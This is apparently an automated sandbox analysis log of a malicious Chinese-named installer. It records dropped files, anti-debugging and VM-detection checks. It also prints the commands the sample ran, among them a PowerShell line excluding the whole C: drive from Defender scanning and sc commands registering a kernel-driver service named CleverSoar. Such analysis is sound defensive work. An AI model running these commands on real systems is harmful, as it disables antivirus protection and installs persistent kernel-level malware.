Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static file information: File size 5694753 > 1048576
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1892309126.0000000003110000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1892434905.0000000003310000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_002057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 9_2_002057D0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: real checksum: 0x0 should be: 0x56ef0c
Source: update.vac.1.dr Static PE information: real checksum: 0x0 should be: 0x376862
Source: updat4.vac.6.dr Static PE information: real checksum: 0x0 should be: 0x376862
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr Static PE information: real checksum: 0x0 should be: 0x34399d
Source: update.vac.6.dr Static PE information: real checksum: 0x0 should be: 0x376862
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x34399d
Source: tProtect.dll.12.dr Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: section name: .didata
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr Static PE information: section name: .didata
Source: update.vac.1.dr Static PE information: section name: .00cfg
Source: update.vac.1.dr Static PE information: section name: .voltbl
Source: update.vac.1.dr Static PE information: section name: .j)q
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr Static PE information: section name: .didata
Source: 7zr.exe.6.dr Static PE information: section name: .sxdata
Source: update.vac.6.dr Static PE information: section name: .00cfg
Source: update.vac.6.dr Static PE information: section name: .voltbl
Source: update.vac.6.dr Static PE information: section name: .j)q
Source: is-0C2B4.tmp.6.dr Static PE information: section name: .xdata
Source: updat4.vac.6.dr Static PE information: section name: .00cfg
Source: updat4.vac.6.dr Static PE information: section name: .voltbl
Source: updat4.vac.6.dr Static PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA1750B push ecx; ret 6_2_6CA1751E
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8C0F00 push ss; retn 0001h 6_2_6C8C0F0A
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA499F4 push 004AC35Ch; ret 6_2_6CA49A0E
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CAE5290 push eax; ret 6_2_6CAE52BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_001845F4 push 0022C35Ch; ret 9_2_0018460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_0021FB10 push eax; ret 9_2_0021FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_0021FE90 push eax; ret 9_2_0021FEBE
Source: update.vac.1.dr Static PE information: section name: .j)q entropy: 7.186767136264165
Source: update.vac.6.dr Static PE information: section name: .j)q entropy: 7.186767136264165
Source: updat4.vac.6.dr Static PE information: section name: .j)q entropy: 7.186767136264165
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\is-0C2B4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-SND3J.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-C426E.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe File created: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-C426E.tmp\update.vac
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe File created: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-SND3J.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SND3J.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-C426E.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5942
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3853
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Window / User API: threadDelayed 526
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Window / User API: threadDelayed 503
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Window / User API: threadDelayed 506
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-0C2B4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SND3J.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-C426E.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-C426E.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SND3J.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\updat4.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe API coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2284 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\sc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\sc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA098B0 FindFirstFileA,FindClose,FindClose, 6_2_6CA098B0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_00186868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 9_2_00186868
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_00187496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 9_2_00187496
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_00189C60 GetSystemInfo, 9_2_00189C60
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000002.1865902487.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C893886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6C893886
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA1EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CA1EFA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_002057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 9_2_002057D0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA1DF9D mov eax, dword ptr fs:[00000030h] 6_2_6CA1DF9D
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA28B86 mov eax, dword ptr fs:[00000030h] 6_2_6CA28B86
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA28B55 mov eax, dword ptr fs:[00000030h] 6_2_6CA28B55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA17ADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6CA17ADD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.12.dr Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
